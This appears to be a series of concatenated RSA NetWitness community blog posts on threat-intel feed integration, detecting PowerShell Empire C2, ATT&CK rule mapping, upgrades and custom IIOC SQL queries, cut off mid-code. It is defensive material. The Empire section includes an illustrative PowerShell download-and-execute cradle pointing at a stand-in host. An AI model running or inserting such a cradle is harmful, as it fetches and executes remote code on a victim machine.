
RSA NetWitness has a number of integrations with threat intel data providers, but two that I have come across recently were not listed (MISP and Minemeld), so I figured it would be a good challenge to see whether they could be made to provide data in a way that NetWitness understood.


Current RSA Ready Integrations



Install the MISP server in a few different ways


A VMware image, a Docker image, or a native OS install are all available (the VMware image worked best for me)


Authenticate and set up the initial data feeds into the platform

Set the schedule to get them polling for new data


Once the feeds are created and being pulled in, you can look at the attributes to make sure you have the data you expect


Test the API calls using PyMISP via Jupyter Notebook

  • You can edit the notebook code to change the interval of data to pull back (last 30 days, all data, etc.) to limit the impact on the MISP server
  • You can change the indicator type (ip-dst, domain, etc.) to pull back the relevant columns of data
  • You can change the column data to make sure you have what you need as other feed data
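The notebook tweaks above boil down to a couple of search parameters. Here is a minimal sketch, assuming a hypothetical MISP URL and API key (substitute your own); the `search()` call with `controller`, `type_attribute`, and `last` arguments is from the PyMISP API:

```python
# Sketch: pull recent ip-dst attributes from MISP via PyMISP.
# Requires "pip install pymisp"; URL and key below are placeholders.
try:
    from pymisp import PyMISP
except ImportError:          # keep the sketch importable without pymisp installed
    PyMISP = None

MISP_URL = "https://misp.local"
MISP_KEY = "YOUR_API_KEY"

def search_args(attr_type="ip-dst", last="30d"):
    """Arguments for misp.search(); tune 'last' (e.g. '30d') to limit load on the MISP server."""
    return {"controller": "attributes", "type_attribute": attr_type, "last": last}

if PyMISP is not None and __name__ == "__main__":
    misp = PyMISP(MISP_URL, MISP_KEY, ssl=False)
    result = misp.search(**search_args())
    for attr in result["response"]["Attribute"]:
        print(attr["value"])
```

Changing the indicator type or interval is then just a matter of passing different arguments to `search_args()`.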


Once that checks out and you have the output data you want via the notebook, you can add the Python script to the head server of NetWitness


Install PyMISP on the head server of the NetWitness system so that you can crontab the query.

  • Install PyMISP using PIP

(keep in mind that updating the code on the head server could break things so be careful and test early and often before committing this change in production)

yum install python-pip
OWB_FORCE_FIPS_MODE_OFF=1 pip install pymisp
OWB_FORCE_FIPS_MODE_OFF=1 pip install --upgrade pip
yum repolist
vi /etc/yum.repos.d/epel.repo
(change enabled from 1 to 0)

Make sure you disable the EPEL repo after installing so that you don't create package update issues later


Now set up the query that is needed in a script (export the Jupyter notebook as a Python script)
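The output stage of that exported script can be as simple as writing the attributes to CSV with the ip-dst value in the 3rd column. The column layout below is an illustrative assumption; match it to whatever you map in your feed definition:

```python
# Sketch: write MISP attributes into the CSV that the NetWitness recurring
# feed will read. The column order is an assumption -- here the ip-dst
# value lands in the 3rd column.
import csv

def attribute_rows(attributes):
    # event_id, category, ip-dst value, comment
    return [[a.get("event_id", ""), a.get("category", ""),
             a.get("value", ""), a.get("comment", "")] for a in attributes]

def write_feed_csv(attributes, path):
    with open(path, "w", newline="") as f:
        csv.writer(f).writerows(attribute_rows(attributes))
```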


Crontab the query to schedule it (the OWB_FORCE_FIPS_MODE_OFF variable is required to work around FIPS restrictions that break a number of script-related items in Python)

23 3 * * * OWB_FORCE_FIPS_MODE_OFF=1 /root/rsa-misp/ > /var/lib/netwitness/common/repo/misp-ip-dst.csv


Now setup the NetWitness recurring feed to pull from the local feed location

Map the ip-dst values (for this script) to the 3rd column and the other columns as required





Minemeld is another free intel aggregation tool, from Palo Alto Networks, that can be installed in many ways (I tried a number of installs on different Ubuntu OSes and had difficulties); the one that worked best for me was the Docker image.


Docker image that worked well for my testing


docker run -it --tmpfs /run -v /somewhere/minemeld/local:/opt/minemeld/local -p 9443:443 jtschichold/minemeld

To make it run as a daemon after testing, add the -d flag so the container continues running after you exit the terminal


After installing, you will log in and set up a new output action to take your feeds and map them to a format and output that can be used with RSA NetWitness. (If you do this right, you can include a certificate in the initial build of the container, which will help with certificate trust to NetWitness.)


This is the pipeline that we will create which will map a sample threat intel list to an output action so that NetWitness can consume that information

It gets defined by editing the yml configuration file (specifically, this section creates the outboundhcvalues section that NetWitness reads):

outboundhcvalues:
  inputs:
    - aggregatorIPv4Outbound-1543370742868
  output: false
  prototype: stdlib.feedHCGreenWithValue

This is a good start for how to create custom miners


Once created and working you will have a second miner listed and the dashboard will update


You can test the feed output using a direct API call like this via the browser


The query parameters are explained here:


in this case:


tr=1 translates IP ranges into CIDRs. This can also be used with v=json and v=csv.


v=csv returns the indicator list in CSV format.


The list of attributes is specified by using the parameter f one or more times. The default name of the column is the name of the attribute; to specify a column name, add |column_name to the f parameter value.


The h parameter can be used to control the generation of the CSV header. When unset (h=0), the header is not generated. Default: set.


Encoding is utf-8. By default no UTF-8 BOM is generated. If ubom=1 is added to the parameter list, a UTF-8 BOM is generated for compatibility.


The f parameters are the column names from the feed

Testing this command drops a file in your browser to look at, so you can make sure you have the data and columns that you want
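The same browser test can be scripted; here is a sketch using requests, with a hypothetical host and feed name, and the v/f/h parameters described above (`verify=False` because the Docker image ships a self-signed certificate):

```python
# Sketch: fetch a Minemeld output feed as CSV. Host, port, and feed name
# are placeholders for your own instance.
try:
    import requests
except ImportError:      # keep the sketch importable without requests installed
    requests = None

FEED_URL = "https://minemeld.local:9443/feeds/outboundhcvalues"

def feed_params(columns=("indicator",), header=True):
    # v=csv selects CSV output, one f entry per column, h toggles the header row
    return [("v", "csv")] + [("f", c) for c in columns] + [("h", "1" if header else "0")]

if requests is not None and __name__ == "__main__":
    resp = requests.get(FEED_URL, params=feed_params(), verify=False)
    print(resp.text[:200])
```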


Now, once you are confident in the process and the output format, you can script and crontab the output to drop into the local feed location on the head server (I did this as I couldn't figure out how to get NetWitness to accept the self-signed certificate from the Docker image).

# 22 3 * * * /root/rsa-minemeld/

Now create the same kind of local recurring feed to pull in the information as feed data on your decoders.

Define the first column to match the IP in CIDR notation and map the other columns as required




Now we have a pipeline for two additional threat data aggregators that you may have a need for in your environment.

There are a myriad of post-exploitation frameworks that can be deployed and utilized by anyone. These frameworks are great to stand up as a defender to get insight into what C&C (command and control) traffic can look like, and how to differentiate it from normal user behavior. The following blog post demonstrates an endpoint becoming infected, and the subsequent analysis in RSA NetWitness of the traffic from PowerShell Empire.


The Attack

The attacker sets up a malicious page which contains their payload. The attacker can then use a phishing email to lure the victim into visiting the page. Upon the user opening the page, a PowerShell command is executed that infects the endpoint and is invisible to the end user:



The endpoint then starts communicating back to the attacker's C2. From here, the attacker can execute commands such as tasklist, whoami, and other tools:


From here onward, the command and control would continue to beacon at a designated interval to check back for commands. This is typically what the analyst will need to look for to determine which of their endpoints are infected.


The Detection Using RSA NetWitness Network/Packet Data

The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.


The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. The analyst can then look into pulling apart the characteristics of the protocol by using the Service Analysis meta key. From here, they notice a couple of interesting meta values to pivot on: http with binary and http post no get no referer directtoip:


Upon reducing the number of sessions to a more manageable number, the analyst can then look into other meta keys to see if there are any interesting artifacts. The analyst looks under the Filename, Directory, Client Application, and Server Application meta keys, and observes the communication is always towards a microsoft-iis/7.5 server, from the same user agent, and toward a subset of PHP files:


The analyst decides to use this as a pivot point, and removes some of the other more refined queries, to focus on all communication toward those PHP files, from that user agent, and toward that IIS server version. The analyst now observes additional communication:


Opening up the visualization, the analyst can view the cadence of the communication and observes there to be a beacon type pattern:


Pivoting into the Event Analysis view, the analyst can look into a few more details to see if their suspicions of this being malicious are true. The analyst observes a low variance in payload, and a connection which is taking place ~every 4 minutes:


The analyst reconstructs some of the sessions to see the type of data being transferred, and observes a variety of suspicious GETs and POSTs with varying data being transferred:


The analyst confirms this traffic is highly suspicious based on the analysis they have performed, and subsequently decides to track the activity with an application rule. To do this, the analyst looks through the metadata associated with this traffic, and finds a unique combination of metadata that identifies this type of traffic:


(service = 80) && (analysis.service = 'http1.0 unsupported cache header') && (analysis.service = 'http post missing content-type')


IMPORTANT NOTE: Application rules are very useful for tracking activity. They are, however, very environment specific; an application rule used in one environment may be of high fidelity, but when used in another could be incredibly noisy. Care should be taken when creating or using application rules to make sure they work well within your environment.


The Detection Using RSA NetWitness Endpoint Tracking Data

The analyst, as they should on a daily basis, is perusing the IOC, BOC, and EOC meta keys for suspicious activity. Upon doing so, they observe the meta value browser runs powershell and begin to investigate:


Pivoting into the Event Analysis view, the analyst can see that Internet Explorer spawned PowerShell, and subsequently the PowerShell that was executed:


The analyst decides to decode the base64 to get a better idea as to what the PowerShell is executing. The analyst observes the PowerShell is setting up a web request, and can see the parameters it would be supplying for said request. From here, the analyst could leverage this information and start looking for indicators of this in their packet data (this demonstrates the power behind having both Endpoint, and Packet solutions):
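The decoding step is easy to reproduce: PowerShell's -EncodedCommand argument is Base64 over UTF-16LE text, so decode accordingly. A small sketch (the sample command below is illustrative, not the one from this capture):

```python
import base64

def decode_ps_encoded(b64: str) -> str:
    # PowerShell -EncodedCommand blobs are Base64-encoded UTF-16LE
    return base64.b64decode(b64).decode("utf-16-le")

# Round-trip an illustrative download-cradle command:
sample = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')".encode("utf-16-le")
).decode()
print(decode_ps_encoded(sample))
```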


Pivoting in on the PowerShell that was launched, it is also possible to see the whoami and tasklist commands that were executed as well. This helps the analyst to paint a picture of what the attacker was doing:



The traffic outlined in this blog post is of a default configuration of PowerShell Empire; it is therefore possible for the indicators to be different depending upon who sets up the instance of PowerShell Empire. With that being said, C2s still need to check in, C2s still need to deploy their payload, and C2s will still perform suspicious tasks on the endpoint. The analyst only needs to pick up on one of these activities to start pulling on a thread and unwinding the attacker's activity.


It is also important to note that PowerShell Empire network traffic is cumbersome to decrypt. It is therefore important to have an endpoint solution, such as NetWitness Endpoint, that tracks the activities performed on the endpoint for you.


Further Work

Rui Ataide has been working on a script to scrape data looking for instances of PowerShell Empire. The attached Python script queries the API looking for specific body request hashes, then subsequently gathers information surrounding the C2, including:


  • Hosting Server Information
  • The PS1 Script
  • C2 Information


Also attached is a sample output from this script with the PowerShell Empire metadata that has currently been collected.

Oftentimes, Administrators and Content Managers alike need more information regarding their current parser status (both Logs and Network [formerly Packets]). There is an older, fancier interface for Log parser meta keys located here:

The script in this blog post is a bit more real-time and allows you to gain some additional visibility into your meta keys.




Please ensure you have run the on your SA Server (10.x) or NW Server / Node0 (v11). The script requires access to downstream services using SCP for the log parsing functionality.




Log Parser -> Meta Key Mapping:
When run in Log mode with a specific parser as a parameter, this will output all of the meta keys used in that parser. It will also output the format and whether that key is "Passed to the Concentrator", that is, whether the key's flag is set to Transient (not passed to the Concentrator in the session) or None (passed to the Concentrator).


Network Parser -> Meta Key Mapping:
When run in Network mode with the IP of the Network Decoder, it will output all of the Enabled parsers with their respective keys.

White = Enabled
Yellow = Transient
Red = Disabled




To run in Log mode:
Example: ./ -l <PARSER NAME> -i <LOG DECODER IP>
Example: ./ -l rhlinux -i


To run in Network mode:
Example: ./ -n -i <NETWORK DECODER IP>
Example: ./ -n -i

Sample Output


Log Parser -> Meta Key Mapping


Network Parser -> Meta Key Mapping


Hi Everyone,

On behalf of RSA NetWitness, we are excited to bring you our first issue of the RSA NetWitness Platform newsletter.


Our goal is to share more information about what's happening and key things for you to be aware of regarding our products and services.


This will be a monthly newsletter, so you can expect the next newsletter in early May.  


No, this is not an April Fools' joke!


There's a very short survey at the end of the second page in the newsletter.  Please share your thoughts with us so we can continue to improve it over time and make sure it contains useful information for you going forward.  


Thanks everyone!


***  EDIT  *** 

For anyone who does not feel comfortable downloading and viewing the .pdf copy of this newsletter, I've added screenshots of the newsletter so that you can still view the content.  Just note that by doing this, obviously none of the hyperlinks will work for you unless you download the .pdf.




Introduction to MITRE’s ATT&CK™

Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) for enterprise is a framework which describes adversarial actions or tactics from Initial Access (Exploit) to Command & Control (Maintain). ATT&CK™ Enterprise deals with the classification of post-compromise adversarial tactics and techniques against Windows™, Linux™ and macOS™.

This community-enriched model adds techniques used to realize each tactic. These techniques are not exhaustive, and the community adds them as they are observed and verified.

To read more about how ATT&CK™ is helpful in resolving challenges and validating our defenses, please check this article.


Introduction to MITRE’s ATT&CK™ Navigator

ATT&CK™ Navigator is a tool openly available through GitHub which uses STIX 2.0 content to provide a layered visualization of the ATT&CK™ model.

ATT&CK™ Navigator stores information in JSON files and each JSON file is a layer containing multiple techniques which can be opened on Navigator web interface. The JSON contains content in STIX 2.0 format which can be fetched from a TAXII 2.0 server of your own choice. For example, we can fetch ATT&CK™ content from MITRE's TAXII 2.0 server through APIs.

The techniques in this visualization can be:

  • Highlighted with color coding.
  • Added with a numerical score to signal severity/frequency of the technique.
  • Added with a comment to describe that occurrence of technique or any other meaningful information.

These layers can be exported in SVG and Excel formats.


How to View a JSON in ATT&CK™ Navigator?

  1. Open MITRE’s ATT&CK™ Navigator web application.
  2. In Navigator, open a new tab by clicking the '+' button.

  3. Then click on 'Open Existing Layer' and then 'Upload from Local', which will let you choose a JSON file from your local machine (or the one attached later in this blog).


  4. After uploading the JSON file, the layer will be opened in Navigator and will look like this:



This visualization highlights the techniques covered in the JSON file with color and comments.


RSA NetWitness Endpoint Application Rules

The Rule Library contains all the Endpoint Application Rules and we can map these rules or detection capabilities to the tactics/techniques of ATT&CK™ matrix. The mapping shows how many tactics/techniques are detected by RSA NetWitness Endpoint Application Rules.

We have created a layer as a JSON file which has all the NetWitness Endpoint Application Rules mapped to techniques. Then we have imported that layer on ATT&CK™ Navigator matrix to show the overlap. In the following image, we can see all the techniques highlighted that are detected by NetWitness Endpoint Application Rules:




The JSON for Endpoint Application Rules is attached with this blog and can be downloaded.


While hovering the mouse over each colored technique, you can see three things:

  1. Technique ID: The unique ID of each technique as per the ATT&CK™ framework.
  2. Score: The threat score given to each technique.
  3. Comment: We can write anything related in the comment to put things in perspective. In this case, we have commented the pipe (‘|’) delimited names of the application rules which cover that technique.
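A layer like the attached one can also be generated programmatically. Here is a minimal sketch of the Navigator layer JSON carrying those three fields; the rule names and score below are illustrative, not the actual mapping:

```python
import json

def make_layer(name, techniques):
    # techniques: iterable of (techniqueID, score, comment) tuples
    return {
        "name": name,
        "domain": "mitre-enterprise",
        "techniques": [
            {"techniqueID": tid, "score": score, "comment": comment}
            for tid, score, comment in techniques
        ],
    }

layer = make_layer("NWE Application Rules",
                   [("T1086", 100, "Rule A|Rule B")])  # T1086 = PowerShell
print(json.dumps(layer, indent=2))
```

The resulting JSON file can be uploaded through 'Open Existing Layer' exactly as described above.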


To quantify how far the RSA NetWitness Endpoint Application Rules spread across the matrix, we can refer to the following plot:




We have already mapped RSA ESA Rules to the ATT&CK™ framework as described in this article. We can update this ATT&CK™ coverage periodically, which will give us a consolidated picture of our complete defense system, and thus we can quantify and monitor the evolution of our detection capabilities.








This is not an April Fools’ Day joke – RSA Charge registration fees go up from $595 to $995 on April 2. Trust us, you will not want to miss this year’s Charge event. REGISTER TODAY!


RSA Charge 2019 will provide you a place to discover game-changing business-driven security solutions to meet today’s greatest business challenges. Attendees will explore best practices and have opportunities to problem-solve and discuss ideas for product and service innovation to increase productivity. From customer case studies to training as well as one-on-one consultations and motivating keynotes, this year’s conference has something for everyone!


RSA Charge 2019 will deliver a host of new content and exciting opportunities through:

Customer-led case studies and hands-on workshops to share trends and issues specific to your industry

Thought-provoking keynote presentations that provide insights on RSA’s products, solutions and customer successes

Partner Expo highlights solutions that are driving high-impact business benefits using RSA’s solutions

Unparalleled Networking invites you to exchange ideas with your peers and RSA experts. And save: early bird rates are $595 and available through April 1, 2019; then the regular registration price kicks in at $995. The RSA Charge 2019 website should be your go-to destination for all ‘Charge’ information: Call for Speakers, Agendas at a Glance, Full Agendas and speakers, Keynotes, and so much more.


RSA Charge 2019 will be held September 16-19, 2019 at the Walt Disney World Dolphin & Swan Hotel in Orlando.


REGISTER before April 2, save $400 and check out the RSA Charge 2019 website for continual updates like the one below:


Just Added: Looking for pre-conference training? Due to RSA Charge starting on a Monday and being on the Disney grounds, RSA has decided not to offer pre-conference training this year, but instead to offer a whole RSA University track dedicated to your favorite training topics at no extra cost. That’s right, no additional cost!


There will also be RSAU representatives onsite to talk shop and answer any and all of your questions, just another reason to attend RSA Charge 2019. We look forward to seeing you all in Orlando.

Cisco Umbrella uses the internet’s infrastructure to block malicious destinations before a connection is ever established. By delivering security from the cloud, it not only saves you money, but also provides more effective security. Cisco Umbrella observes your internet traffic, blocks any malicious destinations and logs the activities. Our Cisco Umbrella plugin collects these logs into the NetWitness Platform, which helps security analysts to analyze the different kinds of attacks, security breaches, etc.


For more information please refer to:


Logs from the Cisco Umbrella cloud can be exported to an AWS S3 bucket, which can be managed by Cisco or by the customer. The Cisco Umbrella plugin uses Amazon's API to fetch the logs from the AWS S3 bucket.
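A collection pass against that bucket can be sketched with boto3 (Amazon's Python SDK). The bucket name and prefix below are placeholders; the real values come from your Umbrella log-management configuration:

```python
# Sketch: list and download Umbrella log files from S3. Bucket and prefix
# are placeholders, not real Umbrella values.
try:
    import boto3
except ImportError:      # keep the sketch importable without boto3 installed
    boto3 = None

BUCKET = "your-umbrella-log-bucket"   # placeholder
PREFIX = "dnslogs/"                    # placeholder

def uncollected_keys(keys, last_seen=""):
    """Keys newer than the last one collected (timestamped names sort lexicographically)."""
    return sorted(k for k in keys if k > last_seen)

if boto3 is not None and __name__ == "__main__":
    s3 = boto3.client("s3")
    listing = s3.list_objects_v2(Bucket=BUCKET, Prefix=PREFIX)
    for key in uncollected_keys([o["Key"] for o in listing.get("Contents", [])]):
        s3.download_file(BUCKET, key, key.rsplit("/", 1)[-1])
```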





Configuration Guide:  Cisco Umbrella Event Source Configuration Guide 

Collector Package on RSA Live: "Cisco Umbrella Log Collector Configuration"

Parser on RSA Live: CEF

On a recent engagement, I took a different approach to finding possible malicious files entering the customer's network. Rather than focusing on e-mail, I looked for any RAR files, macro-enabled Office documents, and portable executable (PE) files entering the network where no service was specified. Of course, this was done using RSA NetWitness, and I immediately found a RAR file which contained a malicious executable. However, this was a different vector by which it entered the network. It didn't appear to be a link that someone clicked from an e-mail, and it wasn't an attachment from an e-mail either. It was from a customer-configured, cloud-based support site. You can find many customers who use these types of sites.


So here's how I believe this was attempted. A malicious actor goes to the <customer name>.<customer support site>.com site, where they open a support ticket for an order they placed (of course, they probably didn't place an actual order). Then, using the support interface, they upload what appears to be an order list. In this instance, I found the file name was "OrderList_Xlsx.arj", which is a RAR file, and inside was a file called "OrderList.exe", all of which was downloaded by the customer support representative using their admin console to the site.


It's a simple approach. It involves the actor opening a support ticket on the customer's site, but whether they are actually doing this by hand or using a script/automation is another question. In this instance, I didn't see it as being targeted towards this customer, but maybe they're testing the waters. Without having access to this customer's admin console for the service, it's hard to determine whether this is happening more frequently, because from our perspective we only see where the employee downloads the file and it enters the customer's network.


I created a quick and easy search to find this type of activity. = '<customer name>.<customer support site>.com' && (filetype = 'rar' || filetype = 'windows executable' || ((filetype = 'zip' || filetype contains 'office') && filename contains 'vbaproject.bin') || extension contains 'docm','xlsm','pptm' || content contains 'macro')

This post details some of the implications of running in a mixed-mode environment. For the purposes of this post, a mixed-mode environment is one in which some services are running on RSA Security Analytics 10.6.x, and others are running on RSA NetWitness 11.x.


Note: RSA strongly suggests upgrading your 10.x services to 11.x to match your NetWitness server version, but running in Mixed-Mode allows you to stage your upgrade, especially for larger environments.


If you run in a mixed-mode environment for an extended time, you may see or experience some or all of the following behaviors:

Overall Administration and Management Functionality

  • If you add any 10.6.x hosts, you must add them manually to the v11.x architecture.
    • There is no automatic discovery, or trust establishment via certificates.
    • You need to manually add them through username and password.
  • In 11.x, a secondary or alternate NetWitness (NW) Server is not currently supported, though this may change for future NetWitness versions.
    • Only the Primary NW Server could be upgraded (which would become "Node0").
    • Secondary NW Servers could be re-purposed to other host types.
  • The Event Analysis View is not available at all in mixed mode, and will not work until ALL devices are upgraded to 11.x.

Mixed Brokers

If you do not upgrade all of your Brokers, the existing Navigate and Event Grid view will still be available.

Implications for ESA

If you follow the recommended upgrade procedure for ESA services, note the following:

  • During the ESA upgrade, the following mongo collections are moved from the ESA mongodb to the NW Server mongodb:
    • im/aggregation_rule.*
    • im/categories
    • im/tracking_id_sequence
    • context-wds/* // all collections
    • datascience/* // all collections
  • The upgrade process performs some reformatting of the data: so make sure to follow those procedures as described in the Physical Host Upgrade Guide and Physical Host Upgrade Checklist documents, available on RSA Link. One way to find these documents is to open the Master Table of Contents, where links are listed in the Installation and Upgrade section.


IMPORTANT! You MUST upgrade your ESA services at the same time you upgrade the NetWitness Server. If you do not, you will have to re-image all of the ESA services as new, and thus lose all of your data. Also, if you do not plan on updating your ESA services, you need to REMOVE them from the 10.6.x Security Analytics Server before you start your upgrade.

Hosts/Services that Remain on 10.6.x

  • If you add a 10.6.x host after you upgrade to 11.x, no configuration management is available through the NetWitness UI. You must use the REST API for this. Existing 10.6.x devices will be connected and manageable via 11.x -- as long as you do not remove any aggregation links.
  • You need to aggregate from 10.6.x hosts to 11.x hosts manually.
    • For example, for a Decoder on 10.6.x and a Concentrator on 11.x:
    • Same applies for any other 11.x service that is aggregating from a 10.6.x host.
  • If you have a secondary Security Analytics Server, RSA recommends that you keep it online to manage any hosts or services that still are running 10.6.x, until you have upgraded them all to 11.x. 


If you are doing an upgrade on a system that has hybrids, the communication with the hybrids will still be functional. The Puppet CA cert is used as the cert for the upgraded 11.x system, so the trust is still in place.

For example, if you have a system with a Security Analytics or NetWitness Server, an ESA service, and several hybrids, you can upgrade the NW Server and the ESA service, and communications with the hybrids will still work.

Recommended Path Away from Mixed-Mode

For large installations, you can upgrade services in phases. RSA recommends working "downstream." For example:

  1. For the initial phase (phase 1), upgrade the NW Server, ESA and Malware services. Also, upgrade at least the top-level Broker. If you have multiple Brokers, the suggestion is to upgrade all of them in phase 1.
  2. For phase 2, upgrade your concentrators, decoders, and so forth. The suggestion is to upgrade the concentrators and decoders in pairs, so they can continue communicating correctly with each other.

Instant Indicators of Compromise (IIOCs) are a feature within the NetWitness Endpoint (NWE) platform that looks for defined behavioral traits such as process execution, memory anomalies, and network activity. By default, NWE is packaged with hundreds of built-in IIOCs that are helpful for identifying malware and hunting for malicious activity. The topic of this article is relevant because new attacker techniques are constantly being discovered, which can potentially be accounted for through the development of new IIOCs. In addition, individual organizations can devise active defense measures specific to their environment for the purpose of identifying potentially anomalous behavior through IIOC customization. Before diving into the details of developing IIOCs, let’s review the NWE documentation on the subject.


Warning: The database on which IIOCs depend is subject to change with each version of NWE, which may affect custom-created IIOCs. The contents of this article are based on the current version of NWE:


The user guide provides a plethora of useful information on the subject of IIOCs, and this article assumes that the reader has a baseline knowledge of attributes such as IIOC level, type, and persistent IIOCs. However, specifically regarding the creation and editing of IIOCs, the documented information is limited. Figure 1 is an excerpt from the NWE manual providing steps for IIOC creation.



Figure 1: Excerpt from NWE User Guide


Reviewing and modifying existing IIOC queries will often allow users to achieve the desired behavior. It is also a great way to enhance the user’s understanding of important database tables, which will be covered more in the query section. However, there is much more that can be said on the topic of IIOC creation. Expounding on these recommendations, as well as the entire “Edit and Create IIOC” section in the user guide, building a new IIOC can be broken down into three major steps.


IIOC Creation Steps:

  • Create a new IIOC entry
  • Develop the SQL Query
  • Validate IIOC for Errors


Create IIOC Entry

Before we delve into the specifics of IIOC queries, let's begin with the basics. A new IIOC can be created in the IIOC window either by clicking the "New" button in the InstantIOC sub-window or by right-clicking on a specific entry in the IIOC table and then choosing the clone option. Both of these options are circled in red in Figure 2. As the name suggests, cloning an IIOC entry will copy over most of the attributes of the designated item such as the level, type, and query. In both cases, the user must click save in the InstantIOC sub-window for any changes to remain.



Figure 2: IIOC Entry Creation Options


When creating a new IIOC make sure that the Active checkbox is not marked until the entry has been finalized. This will prevent the placeholder from executing on the server until the corresponding query has been tested and verified. The IIOC level assigned to a new entry should reflect both its severity as well as the query fidelity. For example, a query that is prone to a high number of false positives would be better suited as a higher level in order to avoid inflated IIOC scores.


There are four unique IIOC types that can be chosen from in the Type drop-down menu: Machine, Module, Event, and Network. The distinction between these types will be further elaborated on in the next section. Also, be aware that IIOCs are platform specific, so the user must ensure that the correct operating system is chosen for the specified IIOC. Changing the OS platform can be done by modifying the ‘OS Type’ field and will cause the IIOC to appear in its matching platform table.



Figure 3: IIOC Platform Tables


At this point, it is also notable that all user-defined IIOCs will automatically be given a non-persistent attribute. This means that any modules or machines associated with the matching conditions of the IIOC will only remain associated as long as the corresponding values that matched are in the database. Non-persistent behavior is potentially problematic for event tracking and scan data, which utilizes ephemeral datasets. In order to bypass this potential pitfall, the persistent field can be updated for the targeted IIOC as seen in the SQL query below.


Update IIOC Persistent Field

Figure 4: Update IIOC Persistent Field
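The pattern of that update can be sketched against a mock table. Note that the table and column names below (`IOCQueries`, `Persistent`, `Name`) are hypothetical stand-ins, not the real NWE schema:

```python
import sqlite3

# Hypothetical, simplified IIOC metadata table -- the real NWE table and
# column names may differ; this only illustrates the update pattern.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE IOCQueries (Name TEXT, Persistent INTEGER)")
con.execute("INSERT INTO IOCQueries VALUES ('My Custom IIOC', 0)")

# Flip the persistent flag for the targeted IIOC.
con.execute("UPDATE IOCQueries SET Persistent = 1 WHERE Name = 'My Custom IIOC'")
flag = con.execute(
    "SELECT Persistent FROM IOCQueries WHERE Name = 'My Custom IIOC'"
).fetchone()
print(flag)  # (1,)
```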

Develop Query

Once a placeholder entry for an IIOC has been created, it can then be altered to achieve the desired behavior by modifying the query. IIOCs are built primarily through the use of SQL select statements. If the reader does not have a fundamental knowledge of the SQL language then a review of SQL tutorials such as W3Schools[1] is recommended.


More complex IIOCs can make use of additional SQL features such as temporary tables, unions, nested queries, aggregator functions, etc. However, a basic IIOC select query can be broken down to three major components: fields, tables, and conditions.


Basic IIOC Query Sections

Figure 5: Query Sections
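The three components can be seen in action against a small mock schema. The table and column names below are simplified stand-ins for the NWE tables, not the real schema:

```python
import sqlite3

# Mock, simplified stand-ins for the NWE tables -- not the real schema.
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE FileNames (PK_FileNames INTEGER PRIMARY KEY, FileName TEXT);
CREATE TABLE MachineModulePaths (
    PK_MachineModulePaths INTEGER PRIMARY KEY,
    FK_Machines INTEGER,
    FK_FileNames INTEGER
);
INSERT INTO FileNames VALUES (1, 'powershell.exe'), (2, 'notepad.exe');
INSERT INTO MachineModulePaths VALUES (10, 100, 1), (11, 100, 2);
""")

# Fields: the keys the IIOC must return.
# Tables: machinemodulepaths joined to filenames.
# Conditions: the behavior being detected.
rows = con.execute("""
    SELECT mmp.FK_Machines, mmp.PK_MachineModulePaths
    FROM MachineModulePaths mmp
    INNER JOIN FileNames fn ON fn.PK_FileNames = mmp.FK_FileNames
    WHERE fn.FileName = 'powershell.exe'
""").fetchall()
print(rows)  # [(100, 10)]
```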


Database Tool

In order to develop and test queries for IIOCs, it is highly advantageous for the user to have access to database administrative software. An example of such a tool is SQL Server Management Studio, which can be installed alongside the Microsoft SQL Server instance on the NWE server. There are many alternative options to choose from, such as HeidiSQL and DBeaver, if the user wishes to connect from a client system or a non-Windows machine. These tools can also be used to provide further visibility into the database structure and to perform direct database queries for analysis purposes.


Required Fields

As shown in Figure 5, IIOCs require specific fields, or columns, to be selected in order to properly reference the required data in the interface. Depending on the IIOC type chosen, these fields will vary slightly, but there will always be one or more primary keys needed from tables such as Machines and MachineModulePaths. Unlike the other types, machine IIOCs only require the primary key of the Machines table. Nevertheless, the NWE server still expects two returned values; in these instances, a NULL value can be used as the second selected field.


Furthermore, the operating system platform will affect the keys that are selected in the IIOCs. Linux does not currently support event or network tracking, and the associated tables do not exist in the NWE database. Selected keys are expected to be in the order shown in Table 1 per entry from top to bottom.


Table 1: Required Fields by Platform


The keys selected can be either the primary keys shown in the table above or their associated foreign keys. Premade IIOC queries typically alias any selected primary keys (PK_*) to match the prefix used for foreign keys (FK_*). However, this aliasing appears to have been done for consistency and does not affect the results of the query.
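A machine IIOC's two-value requirement and the PK-to-FK aliasing can be sketched the same way, again with a mock table and simplified names rather than the real NWE schema:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE Machines (PK_Machines INTEGER PRIMARY KEY, MachineName TEXT)")
con.execute("INSERT INTO Machines VALUES (1, 'WS01'), (2, 'WS02')")

# A machine-type IIOC only needs the machines primary key, but the server
# expects two returned values, so NULL fills the second slot. The PK is
# aliased with an FK_ prefix purely for consistency with premade queries.
rows = con.execute("""
    SELECT PK_Machines AS FK_Machines, NULL
    FROM Machines
    WHERE MachineName = 'WS01'
""").fetchall()
print(rows)  # [(1, None)]
```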


Tables Needed

Moving on to the next section of the IIOC query, we will need to determine which tables are selected or joined. As shown in the previous section, there are required keys based on the IIOC type. Therefore, the selected tables for a valid IIOC query must reference these keys. The tables that are needed will also be dependent on the fields that are utilized for the IIOC conditions, which will be covered in the next section. While there are hundreds of tables in the NWE database, knowledge of a few of them will help to facilitate basic IIOC development.


Since the NWE database currently utilizes a relational database, many important attributes of various objects such as filenames, launch arguments, paths, etc. are stored within different tables. A SQL join is required when queries utilize fields from multiple tables. In most cases when joining a foreign key to a primary key, an “inner join” can be used. However, if the IIOC writer must join tables on a different data point, then an alternative join type should be considered. A similar approach should be taken for any foreign keys that do not have the “Not Null” property.
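The difference between the join types matters when a foreign key can be NULL; this mock (hypothetical, simplified schema) shows an inner join silently dropping such rows while a left join retains them:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE Paths (PK_Paths INTEGER PRIMARY KEY, Path TEXT);
CREATE TABLE MachineModulePaths (
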